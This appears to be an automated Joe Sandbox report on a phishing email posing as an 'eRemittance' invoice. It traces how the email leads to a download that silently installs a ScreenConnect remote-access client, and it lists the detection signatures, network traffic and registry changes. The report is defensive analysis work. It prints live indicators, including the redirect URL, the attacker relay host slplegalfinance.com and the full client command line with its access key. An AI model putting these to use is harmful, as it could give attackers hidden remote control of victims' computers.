Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.eml

Overview

General Information

Sample name:phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.eml
Analysis ID:1593855
MD5:845e539d744aa9d873fcc78322e23aab
SHA1:1a4f474055762a0e8aaed2262e185d0742bcc7e3
SHA256:7f25bc02b8648f3ed9a3597d965ec56801f2e0a5735498f900e3a517b6294b0e
Infos:

Detection

ScreenConnect Tool
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
AI detected landing page (webpage, office document or email)
AI detected suspicious elements in Email content
Changes security center settings (notifications, updates, antivirus, firewall)
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Office Autorun Keys Modification
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 7096 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 880 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "D1E851C1-780A-4AD8-8E17-7E00F8FC2E73" "7773720D-9100-489C-95B7-23FC0504D7F1" "7096" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 5860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=5f30d80bfc49ccfd2ec3457f652892e61ef725c0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 5492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2064,i,3225509582482086580,13909682747020890932,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7836 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5364 --field-trial-handle=2064,i,3225509582482086580,13909682747020890932,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • eRemittance.exe (PID: 8004 cmdline: "C:\Users\user\Downloads\eRemittance.exe" MD5: 5A74CB8603DC7543A6CA2B5A91369267)
        • msiexec.exe (PID: 8080 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • svchost.exe (PID: 2828 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 6640 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 6692 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6848 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 7924 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6096 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msiexec.exe (PID: 8132 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 8176 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6059364A692FB498A42B140D258E2948 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 2732 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID83C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4839593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7592 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding D2104C54B219E825B1B95ED4C489F475 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 3684 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F0AA89784B24B42B9C239E4001478082 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 7680 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=b3dedd11-6dd3-4216-bf0b-f7d49e88a24d&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv&c=&c=UPDATE&c=&c=&c=&c=&c=&c=" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 7852 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "d04c094f-179d-486a-be2c-17bfa71a0d2c" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • cleanup
SourceRuleDescriptionAuthorStrings
C:\Users\user\Downloads\Unconfirmed 376437.crdownloadJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Windows\Temp\~DFCA0C09BBD88D1D46.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Windows\Temp\~DF61B1AA59FC6BE6BD.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Installer\inprogressinstallinfo.ipiJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          C:\Config.Msi\49dfbf.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Click to see the 24 entries
            SourceRuleDescriptionAuthorStrings
            0000000D.00000002.1465099103.0000000005680000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              00000015.00000000.1499986556.0000000000AF2000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                0000000D.00000002.1470052005.00000000074D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  0000000D.00000000.1442769522.0000000000936000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    0000000D.00000002.1458252749.0000000002E51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      Click to see the 1 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=b3dedd11-6dd3-4216-bf0b-f7d49e88a24d&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv&c=&c=UPDATE&c=&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=b3dedd11-6dd3-4216-bf0b-f7d49e88a24d&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv&c=&c=UPDATE&c=&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=b3dedd11-6dd3-4216-bf0b-f7d49e88a24d&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv&c=&c=UPDATE&c=&c=&c=&c=&c=&c=", ProcessId: 7680, ProcessName: ScreenConnect.ClientService.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (484f9eed1d8e13b9) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 8132, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-3A73-5AC4396425A8}\(Default)
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 2828, ProcessName: svchost.exe
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: C:\Users\user\Downloads\Unconfirmed 376437.crdownloadReversingLabs: Detection: 18%

                      Phishing

                      barindex
                      Source: EmailJoe Sandbox AI: Page contains button: 'Review Document' Source: 'Email'
                      Source: EmailJoe Sandbox AI: Email contains prominent button: 'review document'
                      Source: EmailJoe Sandbox AI: Detected potential phishing email: The email contains multiple suspicious redirect links through clicktime.cloud.postoffice.net pointing to potentially malicious domains. The subject line and content follow common phishing patterns mentioning 'remittance' and 'eDocument' to create urgency. The sender's domain doesn't match the service desk contact information and social media links included in the footer
                      Source: EmailClassification: Invoice Scam
                      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49719 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49730 version: TLS 1.2
                      Source: C:\Windows\System32\msiexec.exeFile opened: z:
                      Source: C:\Windows\System32\msiexec.exeFile opened: x:
                      Source: C:\Windows\System32\msiexec.exeFile opened: v:
                      Source: C:\Windows\System32\msiexec.exeFile opened: t:
                      Source: C:\Windows\System32\msiexec.exeFile opened: r:
                      Source: C:\Windows\System32\msiexec.exeFile opened: p:
                      Source: C:\Windows\System32\msiexec.exeFile opened: n:
                      Source: C:\Windows\System32\msiexec.exeFile opened: l:
                      Source: C:\Windows\System32\msiexec.exeFile opened: j:
                      Source: C:\Windows\System32\msiexec.exeFile opened: h:
                      Source: C:\Windows\System32\msiexec.exeFile opened: f:
                      Source: C:\Windows\System32\svchost.exeFile opened: d:
                      Source: C:\Windows\System32\msiexec.exeFile opened: b:
                      Source: C:\Windows\System32\msiexec.exeFile opened: y:
                      Source: C:\Windows\System32\msiexec.exeFile opened: w:
                      Source: C:\Windows\System32\msiexec.exeFile opened: u:
                      Source: C:\Windows\System32\msiexec.exeFile opened: s:
                      Source: C:\Windows\System32\msiexec.exeFile opened: q:
                      Source: C:\Windows\System32\msiexec.exeFile opened: o:
                      Source: C:\Windows\System32\msiexec.exeFile opened: m:
                      Source: C:\Windows\System32\msiexec.exeFile opened: k:
                      Source: C:\Windows\System32\msiexec.exeFile opened: i:
                      Source: C:\Windows\System32\msiexec.exeFile opened: g:
                      Source: C:\Windows\System32\msiexec.exeFile opened: e:
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile opened: c:
                      Source: C:\Windows\System32\msiexec.exeFile opened: a:
                      Source: chrome.exeMemory has grown: Private usage: 1MB later: 31MB

                      Networking

                      barindex
                      Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL Service
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: global trafficDNS traffic detected: DNS query: clicktime.cloud.postoffice.net
                      Source: global trafficDNS traffic detected: DNS query: fub.direct
                      Source: global trafficDNS traffic detected: DNS query: bahraincv.com
                      Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                      Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                      Source: global trafficDNS traffic detected: DNS query: www.google.com
                      Source: global trafficDNS traffic detected: DNS query: slplegalfinance.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49719 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49730 version: TLS 1.2

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\49dfbe.msi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE21F.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE23F.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE483.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\49dfc0.msi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\49dfc0.msi
